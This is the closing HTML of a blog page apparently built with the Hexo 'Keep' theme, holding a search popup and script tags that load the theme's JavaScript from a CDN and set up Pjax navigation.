        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>
        
    </ul>
</div>

    </div>

    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

</main>



<script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/utils.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/main.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/header-shrink.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/back2top.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/dark-light-toggle.js"></script>




    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/local-search.js"></script>



    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/code-block.js"></script>



    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/lazyload.js"></script>


<div class="post-scripts pjax">
    
        <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/post-helper.js"></script>
        
            <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/libs/anime.min.js"></script>
        
        
            <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/toc.js"></script>
        
    
</div>


    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/libs/pjax.min.js"></script>
<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax'
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            KEEP.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            KEEP.utils.pjaxProgressBarEnd();
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            KEEP.refresh();
        });
    });
</script>



</body>
</html>
